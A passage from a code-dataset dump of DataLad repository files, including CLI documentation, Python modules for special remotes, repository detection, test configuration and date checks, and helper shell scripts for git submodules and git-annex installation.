For\nnormal execution use cases, only a single subparser for the target command\nwill be constructed for speed reasons. However, when the command line help\nsystem is requested (``--help``) subparsers for all commands (including\nextensions) are constructed. This can take a considerable amount of time\nthat grows with the number of installed extensions.\n\nThe information necessary to configure a subparser for a DataLad command is\ndetermined by inspecting the respective\n:class:`~datalad.interface.base.Interface` class for that command, and reusing\nindividual components for the parser. This includes:\n\n- the class docstring\n\n- a ``_params_`` member with a dict of parameter definitions\n\n- a ``_examples_`` member, with a list of example definitions\n\nAll docstrings used for the parser setup will be processed by applying a\nset of rules to make them more suitable for the command line environment.\nThis includes the processing of ``CMD`` markup macros, and stripping their\n``PYTHON`` counter parts. Parameter constraint definition descriptions\nare also altered to exclude Python-specific idioms that have no relevance\non the command line (e.g., the specification of ``None`` as a default).\n\n\nCLI-based execution of ``Interface`` command\n============================================\n\nThe execution handler described here is implemented in ``datalad.cli.exec``.\n\nOnce the main command line entry point determine that a command shall be\nexecuted, it triggers a handler function that was assigned and parameterized\nwith the underlying command :class:`~datalad.interface.base.Interface` during\nparser construction. At the time of execution, this handler is given the result\nof ``argparse``-based command line argument parsing (i.e., a ``Namespace``\ninstance).\n\nFrom this parser result, the handler constructs positional and keyword\narguments for the respective ``Interface.__call__()`` execution. It does\nnot only process command-specific arguments, but also generic arguments,\nsuch as those for result filtering and rendering, which influence the central\nprocessing of result recorded yielded by a command.\n\nIf an underlying command returns a Python generator it is unwound to trigger\nthe respective underlying processing. The handler performs no error handling.\nThis is left to the main command line entry point.\n\n" }, { "alpha_fraction": 0.5954142212867737, "alphanum_fraction": 0.5966469645500183, "avg_line_length": 36.55555725097656, "blob_id": "17b625cecbc81f5b269cf9b9514d6df522b7f921", "content_id": "f232d5b87002d8c83adab45d1e37b280d215bf68", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4056, "license_type": "permissive", "max_line_length": 79, "num_lines": 108, "path": "/datalad/customremotes/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Support of custom remotes (e.g. extraction from archives)\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n__all__ = ['RemoteError', 'SpecialRemote']\n\nfrom annexremote import (\n ProtocolError,\n SpecialRemote as _SpecialRemote,\n RemoteError as _RemoteError,\n)\nfrom datalad.support.exceptions import format_exception_with_cause\nfrom datalad.ui import ui\n\n\nclass RemoteError(_RemoteError):\n def __str__(self):\n # this is a message given to remote error, if any\n exc_str = super().__str__()\n # this is the cause ala `raise from`\n exc_cause = getattr(self, '__cause__', None)\n if exc_cause:\n # if we have a cause, collect the cause all the way down\n # we can do quite some chaining\n exc_cause = format_exception_with_cause(exc_cause)\n if exc_str and exc_cause:\n # with have the full picture\n msg = f'{exc_str} -caused by- {exc_cause}'\n elif exc_str and not exc_cause:\n # only a custom message\n msg = exc_str\n elif not exc_str and exc_cause:\n # only the cause\n msg = exc_cause\n else:\n # nothing, shame!\n msg = 'exception with unknown cause'\n # prevent multiline messages, they would be swallowed\n # or kill the protocol\n return msg.replace('\\n', '\\\\n')\n\n\nclass SpecialRemote(_SpecialRemote):\n \"\"\"Common base class for all of DataLad's special remote implementations\"\"\"\n\n def __init__(self, annex):\n super(SpecialRemote, self).__init__(annex=annex)\n # instruct annex backend UI to use this remote\n if ui.backend == 'annex':\n ui.set_specialremote(self)\n\n def message(self, msg, type='debug'):\n handler = dict(\n debug=self.annex.debug,\n info=self.annex.info,\n error=self.annex.error,\n ).get(type, self.annex.debug)\n\n # ensure that no multiline messages are sent, they would cause a\n # protocol error\n msg = msg.replace('\\n', '\\\\n')\n\n try:\n handler(msg)\n except ProtocolError:\n # INFO not supported by annex version.\n # If we can't have an actual info message, at least have a\n # debug message.\n self.annex.debug(msg)\n\n def send_progress(self, progress):\n \"\"\"Indicates the current progress of the transfer (in bytes).\n\n May be repeated any number of times during the transfer process.\n\n Too frequent updates are wasteful but bear in mind that this is used\n both to display a progress meter for the user, and for\n ``annex.stalldetection``. So, sending an update on each 1% of the file\n may not be frequent enough, as it could appear to be a stall when\n transferring a large file.\n\n Parameters\n ----------\n progress : int\n The current progress of the transfer in bytes.\n \"\"\"\n # This method is called by AnnexSpecialRemoteProgressBar through an\n # obscure process that involves multiple layers of abstractions for\n # UIs, providers, downloaders, progressbars, which is only happening\n # within the environment of a running special remote process though\n # a combination of circumstances.\n #\n # The main purpose of this method is to have a place to leave this\n # comment within the code base of the special remotes, in order to\n # aid future souls having to sort this out.\n # (and to avoid having complex code make direct calls to internals\n # of this class, making things even more complex)\n self.annex.progress(progress)\n" }, { "alpha_fraction": 0.5562440156936646, "alphanum_fraction": 0.5595805644989014, "avg_line_length": 27.73972511291504, "blob_id": "8c78ced98100b3556b21297345f01f8364e06398", "content_id": "5ad1f57be7223bb6edf294f524e908e8a3093683", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2098, "license_type": "permissive", "max_line_length": 87, "num_lines": 73, "path": "/datalad/core/local/repo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\" Core repository-related functionality\n\n\"\"\"\n\nfrom datalad.support.exceptions import (\n InvalidGitRepositoryError,\n InvalidAnnexRepositoryError,\n NoSuchPathError,\n)\n\nimport logging\nlgr = logging.getLogger('datalad.core.local.repo')\n\n__all__ = [\"repo_from_path\"]\n\n\ndef repo_from_path(path):\n \"\"\"Get a Repo instance from a path.\n\n Parameters\n ----------\n path : path-like\n Root path of the repository.\n\n Returns\n -------\n Repo\n Repo instance matching the type of the repository at path.\n\n Raises\n ------\n ValueError\n If no repository could be found at the path, or if its type could not\n be determined.\n \"\"\"\n # keep the imports local for now until it is clearer what the module setup\n # will be\n from datalad.support.gitrepo import GitRepo\n from datalad.support.annexrepo import AnnexRepo\n\n repo = None\n for cls, ckw, kw in (\n # Non-initialized is okay. We want to figure the correct instance\n # to represent what's there - that's it.\n (AnnexRepo, {'allow_noninitialized': True}, {'init': False}),\n (GitRepo, {}, {})\n ):\n if not cls.is_valid_repo(path, **ckw):\n continue\n\n try:\n lgr.log(5, \"Detected %s at %s\", cls, path)\n repo = cls(path, create=False, **kw)\n break\n except (InvalidGitRepositoryError, NoSuchPathError,\n InvalidAnnexRepositoryError) as exc:\n lgr.log(\n 5,\n \"Ignore exception after inappropriate repository type guess: \"\n \"%s\", exc)\n\n if repo is None:\n raise ValueError('No repository at {}'.format(path))\n\n return repo\n" }, { "alpha_fraction": 0.6078120470046997, "alphanum_fraction": 0.612868070602417, "avg_line_length": 37.5, "blob_id": "4782f784809d8ba5e7303069d67f765417859186", "content_id": "d4e41cb670e228154f193b744d4f87d00679c7b4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10087, "license_type": "permissive", "max_line_length": 111, "num_lines": 262, "path": "/datalad/conftest.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport re\nfrom contextlib import ExitStack\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.utils import (\n get_encoding_info,\n get_envvars_info,\n get_home_envvars,\n)\n\nfrom . import (\n cfg,\n ssh_manager,\n)\nfrom .log import lgr\n\n_test_states = {}\n\n# handle to an HTTP server instance that is used as part of the tests\ntest_http_server = None\n\[email protected](autouse=True, scope=\"session\")\ndef setup_package():\n import tempfile\n from pathlib import Path\n\n from datalad import consts\n from datalad.support.annexrepo import AnnexRepo\n from datalad.support.cookies import cookies_db\n from datalad.support.external_versions import external_versions\n from datalad.tests import _TEMP_PATHS_GENERATED\n from datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n OBSCURE_FILENAME,\n HTTPPath,\n rmtemp,\n )\n from datalad.ui import ui\n from datalad.utils import (\n make_tempfile,\n on_osx,\n )\n\n if on_osx:\n # enforce honoring TMPDIR (see gh-5307)\n tempfile.tempdir = os.environ.get('TMPDIR', tempfile.gettempdir())\n\n # Use unittest's patch instead of pytest.MonkeyPatch for compatibility with\n # old pytests\n with ExitStack() as m:\n m.enter_context(patch.object(consts, \"DATASETS_TOPURL\", 'https://datasets-tests.datalad.org/'))\n m.enter_context(patch.dict(os.environ, {'DATALAD_DATASETS_TOPURL': consts.DATASETS_TOPURL}))\n\n m.enter_context(\n patch.dict(\n os.environ,\n {\n \"GIT_CONFIG_PARAMETERS\":\n \"'init.defaultBranch={}' 'clone.defaultRemoteName={}'\"\n .format(DEFAULT_BRANCH, DEFAULT_REMOTE)\n }\n )\n )\n cred_cfg = cfg.obtain('datalad.tests.credentials')\n if cred_cfg == 'plaintext':\n m.enter_context(\n patch.dict(\n os.environ,\n {\n 'PYTHON_KEYRING_BACKEND':\n 'keyrings.alt.file.PlaintextKeyring'\n }\n )\n )\n elif cred_cfg == 'system':\n pass\n else:\n raise ValueError(cred_cfg)\n\n def prep_tmphome():\n # re core.askPass:\n # Don't let git ask for credentials in CI runs. Note, that this variable\n # technically is not a flag, but an executable (which is why name and value\n # are a bit confusing here - we just want a no-op basically). The environment\n # variable GIT_ASKPASS overwrites this, but neither env var nor this config\n # are supported by git-credential on all systems and git versions (most recent\n # ones should work either way, though). Hence use both across CI builds.\n gitconfig = \"\"\"\\\n[user]\n name = DataLad Tester\n email = [email protected]\n[core]\n\taskPass =\n[datalad \"log\"]\n exc = 1\n[annex \"security\"]\n\t# from annex 6.20180626 file:/// and http://localhost access isn't\n\t# allowed by default\n\tallowed-url-schemes = http https file\n\tallowed-http-addresses = all\n[protocol \"file\"]\n # since git 2.38.1 cannot by default use local clones for submodules\n # https://github.blog/2022-10-18-git-security-vulnerabilities-announced/#cve-2022-39253\n allow = always\n\"\"\" + os.environ.get('DATALAD_TESTS_GITCONFIG', '').replace('\\\\n', os.linesep)\n # TODO: split into a function + context manager\n with make_tempfile(mkdir=True) as new_home:\n pass\n # register for clean-up on exit\n _TEMP_PATHS_GENERATED.append(new_home)\n\n # populate default config\n new_home = Path(new_home)\n new_home.mkdir(parents=True, exist_ok=True)\n cfg_file = new_home / '.gitconfig'\n cfg_file.write_text(gitconfig)\n return new_home, cfg_file\n\n if external_versions['cmd:git'] < \"2.32\":\n # To overcome pybuild overriding HOME but us possibly wanting our\n # own HOME where we pre-setup git for testing (name, email)\n if 'GIT_HOME' in os.environ:\n m.enter_context(patch.dict(os.environ, {'HOME': os.environ['GIT_HOME']}))\n else:\n # we setup our own new HOME, the BEST and HUGE one\n new_home, _ = prep_tmphome()\n m.enter_context(patch.dict(os.environ, get_home_envvars(new_home)))\n else:\n _, cfg_file = prep_tmphome()\n m.enter_context(patch.dict(os.environ, {'GIT_CONFIG_GLOBAL': str(cfg_file)}))\n\n # Re-load ConfigManager, since otherwise it won't consider global config\n # from new $HOME (see gh-4153\n cfg.reload(force=True)\n\n # datalad.locations.sockets has likely changed. Discard any cached values.\n ssh_manager._socket_dir = None\n\n # To overcome pybuild by default defining http{,s}_proxy we would need\n # to define them to e.g. empty value so it wouldn't bother touching them.\n # But then haskell libraries do not digest empty value nicely, so we just\n # pop them out from the environment\n for ev in ('http_proxy', 'https_proxy'):\n if ev in os.environ and not (os.environ[ev]):\n lgr.debug(\"Removing %s from the environment since it is empty\", ev)\n os.environ.pop(ev)\n\n # Prevent interactive credential entry (note \"true\" is the command to run)\n # See also the core.askPass setting above\n m.enter_context(patch.dict(os.environ, {'GIT_ASKPASS': 'true'}))\n\n # Set to non-interactive UI\n _test_states['ui_backend'] = ui.backend\n # obtain() since that one consults for the default value\n ui.set_backend(cfg.obtain('datalad.tests.ui.backend'))\n\n # in order to avoid having to fiddle with rather uncommon\n # file:// URLs in the tests, have a standard HTTP server\n # that serves an 'httpserve' directory in the test HOME\n # the URL will be available from datalad.test_http_server.url\n\n global test_http_server\n # Start the server only if not running already\n # Relevant: we have test_misc.py:test_test which runs datalad.test but\n # not doing teardown, so the original server might never get stopped\n if test_http_server is None:\n serve_path = tempfile.mkdtemp(\n dir=cfg.get(\"datalad.tests.temp.dir\"),\n prefix='httpserve',\n )\n test_http_server = HTTPPath(serve_path)\n test_http_server.start()\n _TEMP_PATHS_GENERATED.append(serve_path)\n\n yield\n\n lgr.debug(\"Printing versioning information collected so far\")\n # Query for version of datalad, so it is included in ev.dumps below - useful while\n # testing extensions where version of datalad might differ in the environment.\n external_versions['datalad']\n print(external_versions.dumps(query=True))\n try:\n print(\"Obscure filename: str=%s repr=%r\"\n % (OBSCURE_FILENAME.encode('utf-8'), OBSCURE_FILENAME))\n except UnicodeEncodeError as exc:\n ce = CapturedException(exc)\n print(\"Obscure filename failed to print: %s\" % ce)\n def print_dict(d):\n return \" \".join(\"%s=%r\" % v for v in d.items())\n print(\"Encodings: %s\" % print_dict(get_encoding_info()))\n print(\"Environment: %s\" % print_dict(get_envvars_info()))\n\n if os.environ.get('DATALAD_TESTS_NOTEARDOWN'):\n return\n\n ui.set_backend(_test_states['ui_backend'])\n\n if test_http_server:\n test_http_server.stop()\n test_http_server = None\n else:\n lgr.debug(\"For some reason global http_server was not set/running, thus not stopping\")\n\n if len(_TEMP_PATHS_GENERATED):\n msg = \"Removing %d dirs/files: %s\" % (len(_TEMP_PATHS_GENERATED), ', '.join(_TEMP_PATHS_GENERATED))\n else:\n msg = \"Nothing to remove\"\n lgr.debug(\"Teardown tests. \" + msg)\n for path in _TEMP_PATHS_GENERATED:\n rmtemp(str(path), ignore_errors=True)\n\n # Re-establish correct global config after changing $HOME.\n # Might be superfluous, since after teardown datalad.cfg shouldn't be\n # needed. However, maintaining a consistent state seems a good thing\n # either way.\n cfg.reload(force=True)\n\n ssh_manager._socket_dir = None\n\n cookies_db.close()\n\n\[email protected](autouse=True)\ndef capture_logs(caplog, monkeypatch):\n DATALAD_LOG_LEVEL = os.environ.get('DATALAD_LOG_LEVEL', None)\n if DATALAD_LOG_LEVEL is None:\n # very very silent. Tests introspecting logs should use\n # swallow_logs(new_level=...)\n caplog.set_level(100, lgr.name)\n # And we should also set it within environ so underlying commands also\n # stay silent\n monkeypatch.setenv('DATALAD_LOG_LEVEL', '100')\n\n\ndef pytest_ignore_collect(path):\n # Skip old nose code and the tests for it:\n # Note, that this is not only about executing tests but also importing those\n # files to begin with.\n if path.basename == \"test_tests_utils.py\":\n return True\n if path.basename == \"utils.py\" and \\\n path.dirpath().basename == \"tests\" and \\\n path.dirpath().dirpath().basename == \"datalad\":\n return True\n # When pytest is told to run doctests, by default it will import every\n # source file in its search, but a number of datalad source file have\n # undesirable side effects when imported. This hook should ensure that\n # only `test_*.py` files and `*.py` files containing doctests are imported\n # during test collection.\n if path.basename.startswith(\"test_\") or path.check(dir=1):\n return False\n if path.ext != \".py\":\n return True\n return not any(\n re.match(r\"^\\s*>>>\", ln) for ln in path.read_text(\"utf-8\").splitlines()\n )\n" }, { "alpha_fraction": 0.5802538990974426, "alphanum_fraction": 0.5842971205711365, "avg_line_length": 33.983551025390625, "blob_id": "789a763a7dd20b3e953e70b49c304e1a40d803b4", "content_id": "4fa977d48b737c3c6df49cd72a365a3f34636069", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10635, "license_type": "permissive", "max_line_length": 87, "num_lines": 304, "path": "/datalad/support/repodates.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utilities for checking repository dates.\n\"\"\"\n\nimport logging\nimport operator\nimport re\nimport time\n\n\nfrom datalad.log import log_progress\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.gitrepo import GitRepo\n\nlgr = logging.getLogger('datalad.repodates')\n\n\ndef _cat_blob(repo, obj, bad_ok=False):\n \"\"\"Call `git cat-file blob OBJ`.\n\n Parameters\n ----------\n repo : GitRepo\n obj : str\n Blob object.\n bad_ok : boolean, optional\n Don't fail if `obj` doesn't name a known blob.\n\n Returns\n -------\n Blob's content (str) or None if `obj` is not and `bad_ok` is true.\n \"\"\"\n if bad_ok:\n kwds = {\"expect_fail\": True, \"expect_stderr\": True}\n else:\n kwds = {}\n\n try:\n out_cat = repo.call_git([\"cat-file\", \"blob\", obj], read_only=True,\n **kwds)\n except CommandError as exc:\n if bad_ok and \"bad file\" in exc.stderr:\n out_cat = None\n else:\n raise\n return out_cat\n\n\ndef branch_blobs(repo, branch):\n \"\"\"Get all blobs for `branch`.\n\n Parameters\n ----------\n repo : GitRepo\n branch : str\n\n Returns\n -------\n A generator object that returns (hexsha, content, file name) for each blob\n in `branch`. Note: By design a blob isn't tied to a particular file name;\n the returned file name matches what is returned by 'git rev-list'.\n \"\"\"\n # Note: This might be nicer with rev-list's --filter and\n # --filter-print-omitted, but those aren't available until Git v2.16.\n lines = repo.call_git_items_([\"rev-list\", \"--objects\"] + [branch],\n read_only=True)\n # Trees and blobs have an associated path printed.\n objects = (ln.split() for ln in lines)\n blob_trees = [obj for obj in objects if len(obj) == 2]\n\n num_objects = len(blob_trees)\n\n log_progress(lgr.info, \"repodates_branch_blobs\",\n \"Checking %d objects\", num_objects,\n label=\"Checking objects\", total=num_objects, unit=\" objects\")\n # This is inefficient. It makes a git call for each object, some of which\n # aren't even blobs. We could instead use 'git cat-file --batch'.\n for obj, fname in blob_trees:\n log_progress(lgr.info, \"repodates_branch_blobs\",\n \"Checking %s\", obj,\n increment=True, update=1)\n content = _cat_blob(repo, obj, bad_ok=True)\n if content:\n yield obj, content, fname\n log_progress(lgr.info, \"repodates_branch_blobs\",\n \"Finished checking %d objects\", num_objects)\n\n\ndef branch_blobs_in_tree(repo, branch):\n \"\"\"Get all blobs for the current tree of `branch`.\n\n Parameters\n ----------\n repo : GitRepo\n branch : str, optional\n\n Returns\n -------\n A generator object that returns (hexsha, content, file name) for each blob.\n Note: If there are multiple files in the tree that point to the blob, only\n the first file name that is reported by 'git ls-tree' is used (i.e., one\n entry per blob is yielded).\n \"\"\"\n seen_blobs = set()\n lines = list(repo.call_git_items_([\"ls-tree\", \"-z\", \"-r\", branch],\n sep=\"\\0\", read_only=True))\n if lines:\n num_lines = len(lines)\n log_progress(lgr.info,\n \"repodates_blobs_in_tree\",\n \"Checking %d objects in git-annex tree\", num_lines,\n label=\"Checking objects\", total=num_lines,\n unit=\" objects\")\n for line in lines:\n if not line:\n continue\n _, obj_type, obj, fname = line.split()\n log_progress(lgr.info, \"repodates_blobs_in_tree\",\n \"Checking %s\", obj,\n increment=True, update=1)\n if obj_type == \"blob\" and obj not in seen_blobs:\n yield obj, _cat_blob(repo, obj), fname\n seen_blobs.add(obj)\n log_progress(lgr.info, \"repodates_blobs_in_tree\",\n \"Finished checking %d blobs\", num_lines)\n\n\n# In uuid.log, timestamps look like \"timestamp=1523283745.683191724s\" and occur\n# at the end of the line. In the *.log and *.log.meta files that are\n# associated with annexed files, the timestamps occur at beginning of the line\n# and don't have the \"timestamp=\" prefix.\nANNEX_DATE_RE = re.compile(r\"^(?:[^\\n]+timestamp=)?([0-9]+)(?:\\.[0-9]+)?s\",\n re.MULTILINE)\n\n\ndef search_annex_timestamps(text):\n \"\"\"Extract unix timestamps content of the git-annex branch.\n\n Parameters\n ----------\n text : str\n Content from the git-annex branch (e.g., the content of the \"uuid.log\"\n file).\n\n Returns\n -------\n A generator object that returns a unix timestamp (without fractional any\n seconds) for each timestamp found in `text`.\n \"\"\"\n for match in ANNEX_DATE_RE.finditer(text):\n yield int(match.group(1))\n\n\ndef annex_dates(repo, all_objects=True):\n \"\"\"Get git-annex branch blobs containing dates.\n\n Parameters\n ----------\n repo : GitRepo\n all_objects : bool, optional\n Instead for searching the content of all blobs in the git-annex branch,\n search only the blobs that are in the tree of the tip of the git-annex\n branch.\n\n Returns\n -------\n A generator object that returns a tuple with the blob hexsha, a generator\n with the blob's timestamps, and an associated file name.\n \"\"\"\n blob_fn = branch_blobs if all_objects else branch_blobs_in_tree\n for hexsha, content, fname in blob_fn(repo, \"git-annex\"):\n yield hexsha, search_annex_timestamps(content), fname\n\n\ndef tag_dates(repo, pattern=\"\"):\n \"\"\"Get timestamps for annotated tags.\n\n Parameters\n ----------\n repo : GitRepo\n pattern : str\n Limit the tags by this pattern. It will be appended to 'refs/tags'\n argument passed to `git for-each-ref`.\n\n Returns\n -------\n A generator object that returns a tuple with the tag hexsha and timestamp.\n \"\"\"\n for rec in repo.for_each_ref_(\n fields=['objectname', 'taggerdate:raw'],\n pattern='refs/tags/' + pattern):\n if not rec['taggerdate:raw']:\n # There's not a tagger date. It's not an annotated tag.\n continue\n yield rec['objectname'], int(rec['taggerdate:raw'].split()[0])\n\n\ndef log_dates(repo, revs=None):\n \"\"\"Get log timestamps.\n\n Parameters\n ----------\n repo : GitRepo\n revs : list, optional\n Extract timestamps from commit objects that are reachable from these\n revisions.\n\n Returns\n -------\n A generator object that returns a tuple with the commit hexsha, author\n timestamp, and committer timestamp.\n \"\"\"\n opts = [] if revs else [\"--branches\"]\n try:\n for line in repo.get_revisions(revs, fmt=\"%H %at %ct\", options=opts):\n hexsha, author_timestamp, committer_timestamp = line.split()\n yield hexsha, int(author_timestamp), int(committer_timestamp)\n except CommandError as e:\n # With some Git versions, calling `git log --{all,branches,remotes}` in\n # a repo with no commits may signal an error.\n if \"does not have any commits yet\" not in e.stderr:\n raise e\n\n\ndef check_dates(repo, timestamp=None, which=\"newer\", revs=None,\n annex=True, tags=True):\n \"\"\"Search for dates in `repo` that are newer than `timestamp`.\n\n This examines commit logs of local branches and the content of blobs in the\n git-annex branch.\n\n Parameters\n ----------\n repo : GitRepo or str\n If a str is passed, it is taken as the path to a GitRepo.\n timestamp : int, optional\n Unix timestamp. It defaults to a day before now.\n which : {\"newer\", \"older\"}\n Whether to return timestamps that are newer or older than `timestamp`.\n revs : list, optional\n Search for commit timestamps in commits that are area reachable from\n these revisions. Any revision-specification allowed by `git log` can be\n used, including things like `--all`. Defaults to all local branches.\n annex : {True, \"tree\", False}, optional\n If True, search the content of all blobs in the git-annex branch. If\n \"tree\", search only the blobs that are in the tree of the tip of the\n git-annex branch. If False, do not search git-annex blobs.\n tags : bool, optional\n Whether to check dates the dates of annotated tags.\n\n Returns\n -------\n A dict that reports newer timestamps.\n \"\"\"\n if isinstance(repo, str):\n repo = GitRepo(repo, create=False)\n\n if timestamp is None:\n timestamp = int(time.time()) - 60 * 60 * 24\n\n if which == \"newer\":\n cmp_fn = operator.gt\n elif which == \"older\":\n cmp_fn = operator.lt\n else:\n raise ValueError(\"unrecognized value for `which`: {}\".format(which))\n\n results = {}\n\n lgr.debug(\"Checking dates in logs\")\n for hexsha, a_timestamp, c_timestamp in log_dates(repo, revs=revs):\n if cmp_fn(a_timestamp, timestamp) or cmp_fn(c_timestamp, timestamp):\n results[hexsha] = {\"type\": \"commit\",\n \"author-timestamp\": a_timestamp,\n \"committer-timestamp\": c_timestamp}\n\n if tags:\n lgr.debug(\"Checking dates of annotated tags\")\n for hexsha, tag_timestamp in tag_dates(repo):\n if cmp_fn(tag_timestamp, timestamp):\n results[hexsha] = {\"type\": \"tag\",\n \"timestamp\": tag_timestamp}\n\n if annex and \"git-annex\" in repo.get_branches():\n all_objects = annex != \"tree\"\n lgr.debug(\"Checking dates in blobs of git-annex branch%s\",\n \"\" if all_objects else \"'s tip\")\n for hexsha, timestamps, fname in annex_dates(repo, all_objects):\n hits = [ts for ts in timestamps if cmp_fn(ts, timestamp)]\n if hits:\n results[hexsha] = {\"type\": \"annex-blob\",\n \"timestamps\": hits,\n \"filename\": fname}\n\n return {\"reference-timestamp\": timestamp,\n \"which\": which,\n \"objects\": results}\n" }, { "alpha_fraction": 0.6812412142753601, "alphanum_fraction": 0.7033380270004272, "avg_line_length": 22.36263656616211, "blob_id": "bcdc8a3d10cbbb8df4bf09648acca9d3a7ab1419", "content_id": "7b899a9a4476e551acd5b3e36303173c683a1383", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2127, "license_type": "permissive", "max_line_length": 131, "num_lines": 91, "path": "/tools/git-web-submodules.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Helper to replicate and demonstrate problem with git submodules being shared\n# as non-bare repos on the web\n\nset -eu\n\ntopd=/tmp/gitxxmsxYFO #$(tempfile --prefix gitxxx)\ntopd2=${topd}_\ntopd3=${topd}__\necho \"I: directory $topd\"\nrm -rf \"$topd\" \"$topd2\" \"$topd3\"\n\ngitcommit () {\n git commit \"$@\"\n # manually since we aren't pushing to it atm\n git update-server-info\n}\n\ngitinit () {\n git init\n # make it servable from the web\n mv .git/hooks/post-update.sample .git/hooks/post-update\n}\n\ngitaddfile() {\n echo $1 > $1\n git add $1\n gitcommit -m \"added $1\"\n}\n\nstartwebserver() {\n python -m SimpleHTTPServer 8080 2>&1 | sed -e 's,^, WEB: ,g' &\n sleep 1 # to give it time to start\n}\n\n# Initiate a repo with a submodule with relative path\nmkdir $topd\ncd $topd\nmkdir -p $topd\ngitinit\ngitaddfile f1\n\nmkdir sub1\ncd sub1\ngitinit\ngitaddfile f2\ncd ..\n\ngit submodule add ./sub1 sub1\ngitcommit -m 'Added sub1 submodule' -a\n\n# Expose under the webserver\nstartwebserver\n\n# Try to clone and update submodule\ngit clone http://localhost:8080/.git $topd2\ncd $topd2\n# and initialize submodule\ngit submodule update --init || echo \"E: FAILED!\"\n\n# but we can still do it if we adjust the url for already inited submodule\nsed -i -e 's|/.git/sub1|/sub1/.git|g' .git/config\ngit submodule update --init\necho \"I: SUCCESS and the content of file is ...\"\ncd sub1\ncat f2\n# so we could serve later as well\ngit update-server-info\ncd ..\ngit update-server-info\n# kill the webserver\nkill %1\nsleep 1\n\necho \"I: now trying to serve the cloned repo which has a gitlink for sub1/.git\"\n# Expose under the webserver\nstartwebserver\n\n# Try to clone and update submodule\ngit clone http://localhost:8080/.git $topd3\ncd $topd3\n# and initialize submodule\ngit submodule update --init || echo \"E: FAILED!\"\n\n# but we can still do it if we adjust the url for already inited submodule\nsed -i -e 's|/.git/sub1|/sub1/.git|g' .git/config\ngit submodule update --init || echo \"E: Remains broken, I guess due to sub1/.git being a gitlink and git not following its pointer\"\n#echo \"I: SUCCESS and the content of file is ...\"\n#cat sub1/f2\n\nkill %1\n\n" }, { "alpha_fraction": 0.5515487194061279, "alphanum_fraction": 0.5577661991119385, "avg_line_length": 30.592857360839844, "blob_id": "f02f4aae7d22607612b7e1a72bd0802cf6613f7f", "content_id": "a481caeca97fa8f4e11782d316ae007525179bc8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 8846, "license_type": "permissive", "max_line_length": 153, "num_lines": 280, "path": "/tools/ci/install-annex.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# An ultimate helper to use to setup a CI with some git-annex installation\n# Arguments:\n# First argument would be which \"schema\" would it be.\n# Some schemas might like additional arguments.\n#\n# This script\n# - needs to be \"source\"d since some schemas would need to modify env vars\n# - might use \"sudo\" for some operations\n# - might exit with 0 if e.g. specific installation \"is not needed\" (e.g. devel annex == default annex)\n\nfunction _show_schemes() {\n _schemes_doc=(\n \"autobuild # Linux, macOS\"\n \"brew # macOS\"\n \"conda-forge [version] # Linux\"\n \"conda-forge-last [version] # Linux\"\n \"datalad-extensions-build # Linux, macOS\"\n \"deb-url URL # Linux\"\n \"neurodebian # Linux\"\n \"neurodebian-devel # Linux\"\n \"snapshot # Linux, macOS\"\n )\n for s in \"${_schemes_doc[@]}\"; do\n echo \" $s\"\n done\n\n}\n\nfunction _usage() {\n cat >&2 <<EOF\nusage: source $0 [--help] [--adjust-bashrc] [SCHEME [ARGS...]]\n\n*Options*\n --adjust-bashrc\n If the scheme tweaks PATH, prepend a snippet to ~/.bashrc that exports that\n path. Note: This should be positiioned before SCHEME.\n --help\n Display this help and exit.\n\n SCHEME\n Type of git-annex installation (default \"conda-forge\").\n\n$(_show_schemes)\nEOF\n}\n\nfunction setup_neurodebian_devel() {\n # configure\n sed -e 's,/debian ,/debian-devel ,g' /etc/apt/sources.list.d/neurodebian.sources.list | sudo tee /etc/apt/sources.list.d/neurodebian-devel.sources.list\n sudo apt-get update\n}\n\nfunction install_from_dmg() {\n hdiutil attach \"$1\"\n rsync -a /Volumes/git-annex/git-annex.app /Applications/\n hdiutil detach /Volumes/git-annex/\n _annex_bin=/Applications/git-annex.app/Contents/MacOS\n export 